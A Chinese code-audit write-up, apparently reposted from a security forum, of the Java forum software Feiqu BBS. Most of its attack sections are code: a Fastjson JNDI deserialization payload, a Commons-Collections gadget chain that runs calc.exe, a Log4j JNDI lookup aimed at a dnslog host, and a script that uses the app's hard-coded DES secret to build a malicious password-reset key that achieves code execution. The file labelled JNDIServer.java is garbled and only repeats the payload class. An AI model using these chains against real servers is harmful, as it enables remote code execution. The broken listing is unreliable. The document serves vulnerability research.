飞趣开源BBS代码审计-JAVA

wangqiang

​飞趣开源BBS代码审计-JAVA
阿巴阿巴   衡阳信安
2022-04-09 00:00

转载自[url=(https://xz.aliyun.com/t/11137#toc-6)](https://xz.aliyun.com/t/11137#toc-6)[/url]

环境部署
飞趣 BBS 在 gitee 可以下载到源码，它是由 SpringBoot 搭建，根据 README.md 搭建到 IDEA 即可

目录结构
很奇怪的布局，大概看了一下只有 feiqu-front 存在控制器，其他目录都是一些辅助性的东西

​

第三方组件漏洞审计
fastjson：1.2.28
该版本存在反序列化漏洞，可以使用 FastJson1.2.47 通杀 Payload，在项目中创建三个文件验证是否能够利用

​

JNDIPayload.java

1. import java.io.IOException;
   
2. 
   
3. public class JNDIPayload {
   
4.     static {
   
5.         try {
   
6.             Runtime.getRuntime().exec("calc.exe");
   
7.         } catch (IOException e) {
   
8.         }
   
9.     }
   
10. }

复制代码

JNDIServer.java

1. import java.io.IOException;
   
2. 
   
3. public class JNDIPayload {
   
4.     static {
   
5.         try {
   
6.             Runtime.getRuntime().exec("calc.exe");
   
7.         } catch (IOException e) {
   
8.         }
   
9.     }
   
10. }import java.io.IOException;
    
11. 
    
12. public class JNDIPayload {
    
13.     static {
    
14.         try {
    
15.             Runtime.getRuntime().exec("calc.exe");
    
16.         } catch (IOException e) {
    
17.         }
    
18.     }
    
19. }import java.io.IOException;
    
20. 
    
21. public class JNDIPayload {
    
22.     static {
    
23.         try {
    
24.             Runtime.getRuntime().exec("calc.exe");
    
25.         } catch (IOException e) {
    
26.         }
    
27.     }
    
28. }

复制代码

JNDIClient.java

1. import com.alibaba.fastjson.JSON;
   
2. 
   
3. public class JNDIClient {
   
4.     public static void main(String[] args){
   
5. 
   
6.         String text =
   
7.                 "{\n" +
   
8.                 "    "a": {\n" +
   
9.                 "        "@type": "java.lang.Class", \n" +
   
10.                 "        "val": "com.sun.rowset.JdbcRowSetImpl"\n" +
    
11.                 "    }, \n" +
    
12.                 "    "b": {\n" +
    
13.                 "        "@type": "com.sun.rowset.JdbcRowSetImpl", \n" +
    
14.                 "        "dataSourceName": "rmi://127.0.0.1:1099/Exploit", \n" +
    
15.                 "        "autoCommit": true\n" +
    
16.                 "    }\n" +
    
17.                 "}";
    
18. 
    
19.         JSON.parseObject(text);
    
20.     }
    
21. }

复制代码

开启 python http 服务让 JNDIServer 可以访问到 JNDIPayload.class，然后启动 JNDIServer，最后运行 JNDIClient，成功触发了 FastJson 反序列化漏洞

​

​

那么接下来要寻找参数可控的 JSON.parseObject 或 JSON.parse

​

找到一处可能参数可控的位置，路由是 /u/{uid}/home ，开始调试，发现没有执行到 JSON.parseObject 因为 redisString.get() 返回的
数据为 null ，CommonConstant.THOUGHT_TOP_LIST 为 thought_top_list 也就是 redis 的 key，看一下 redis 在哪设置这个 key 的.
​

​

有 redisString.get() 那么就有 redisString.set()，找到了，可以看到置顶的 "想法" 会被设置到 redis thought_top_list 的值

​

置顶一条 "想法"，再次访问 /u/3/home，在源码中写多了一行 String test = redisString.get(); 方便查看从 redis 获取的数据，
可以看到值虽然获取到了，但是不可控，那么 fastjosn 无法利用

​

​

JAVA反序列化漏洞
commons-collections-3.2.1.jar 反序列化漏洞，很经典了，还有其他组件也存在漏洞，这里就列举这一个吧，老规矩在项目中验证一下
没问题可以使用

​

​

CcSerial.java

1. import org.apache.commons.collections.Transformer;
   
2. import org.apache.commons.collections.functors.ChainedTransformer;
   
3. import org.apache.commons.collections.functors.ConstantTransformer;
   
4. import org.apache.commons.collections.functors.InvokerTransformer;
   
5. import org.apache.commons.collections.keyvalue.TiedMapEntry;
   
6. import org.apache.commons.collections.map.LazyMap;
   
7. 
   
8. import java.io.*;
   
9. import java.lang.reflect.Field;
   
10. import java.util.HashMap;
    
11. import java.util.Map;
    
12. 
    
13. public class CcSerial {
    
14.     public static void main(String[] args) throws Exception{
    
15.         Transformer[] fakeTransformers = new Transformer[] {new
    
16.                 ConstantTransformer(1)};
    
17. 
    
18.         Transformer[] transformers = new Transformer[] {
    
19.                 new ConstantTransformer(Runtime.class),
    
20.                 new InvokerTransformer("getMethod", new Class[] { String.class,
    
21.                         Class[].class }, new
    
22.                         Object[] { "getRuntime",
    
23.                         new Class[0] }),
    
24.                 new InvokerTransformer("invoke", new Class[] { Object.class,
    
25.                         Object[].class }, new
    
26.                         Object[] { null, new Object[0] }),
    
27.                 new InvokerTransformer("exec", new Class[] { String.class },
    
28.                         new String[] { "calc.exe" }),
    
29.         };
    
30. 
    
31.         ChainedTransformer chainedTransformer = new ChainedTransformer(fakeTransformers);
    
32. 
    
33.         Map innerMap = new HashMap();
    
34.         Map outerMap = LazyMap.decorate(innerMap, chainedTransformer);
    
35. 
    
36.         TiedMapEntry mapEntry = new TiedMapEntry(outerMap, null);
    
37. 
    
38.         Map expMap = new HashMap();
    
39.         expMap.put(mapEntry, null);
    
40. 
    
41.         setFieldValue(chainedTransformer, "iTransformers", transformers);
    
42. 
    
43.         innerMap.clear();
    
44. 
    
45.         ByteArrayOutputStream barr = new ByteArrayOutputStream();
    
46.         ObjectOutputStream out = new ObjectOutputStream(barr);
    
47.         out.writeObject(expMap);
    
48.         out.close();
    
49. 
    
50.         ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
    
51.         in.readObject();
    
52.         in.close();
    
53. 
    
54.     }
    
55. 
    
56.     private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
    
57.         Field f = obj.getClass().getDeclaredField(field);
    
58.         f.setAccessible(true);
    
59.         f.set(obj, arg);
    
60.     }
    
61. }

复制代码

寻找反序列化利用点，查找 readObject，可以看到只有一处，并且没有调用该方法的地方，这次又是无功而返

​

​

log4j-core-2.11.2

1. import org.apache.logging.log4j.LogManager;
   
2. import org.apache.logging.log4j.Logger;
   
3. 
   
4. public class Log4j {
   
5.     public static void main(String[] args) {
   
6.         Logger logger = LogManager.getLogger(Log4j.class);
   
7.         logger.error("${jndi:ldap://rzepki.dnslog.cn}");
   
8.     }
   
9. }

复制代码

​

寻找漏洞利用点，搜索有没有存在参数可控的 logger.error，在 com\feiqu\web\controller\UserController.java 找到一处，可以看到拼接了 username

​

分析一下 UserController.java#resetPass，首先 key、password、verifyCode 是必不可少的，我们传入的 key 会被 [1] 进行解密，然后在 [2] 给 username 赋值

​

secret 为 cwd22，在创建 DESUtils 时作为构造方法的参数，decryptString 会对传入的 key 做 base64 解码，然后 DES 解密

​

​

我们使用 encryptString 方法加密 log4j 的 Exp 就可以了，在本地开启 JNDI 注入工具 JNDI-Injection-Exploit

​

以下脚本用于生成恶意 key

1. public static void main(String[] args) throws Exception {
   
2.         Key key = null;
   
3.         // 指定DES加密解密所用的密钥
   
4.         String keyStr = "cwd22";
   
5.         String desKey = Base64.encode(keyStr.getBytes("UTF-8"));
   
6.         DESKeySpec objDesKeySpec = new DESKeySpec(desKey.getBytes("UTF-8"));
   
7.         SecretKeyFactory objKeyFactory = SecretKeyFactory.getInstance("DES");
   
8.         key = objKeyFactory.generateSecret(objDesKeySpec);
   
9. 
   
10. 
    
11.         String str = "${jndi:ldap://127.0.0.1:1389/riv58u}";
    
12. 
    
13.         // 对字符串进行DES加密，返回BASE64编码的加密字符串
    
14.         byte[] bytes = str.getBytes();
    
15.         Cipher cipher = Cipher.getInstance("DES");
    
16.         cipher.init(Cipher.ENCRYPT_MODE, key);
    
17.         byte[] encryptStrBytes = cipher.doFinal(bytes);
    
18.         String s = Base64.encode(encryptStrBytes);
    
19.         System.out.println(s);
    
20.     }

复制代码

构造好各个参数提交请求成功弹出计算器

​

调试一下，可以看到因为找不到 userInfo[1] 而报错

​

结语
可谓是一波三折，本人学艺不精，如果有其他利用点还请师傅们指教

来源：先知(https://xz.aliyun.com/t/11137#toc-6)
注：如有侵权请联系删除

​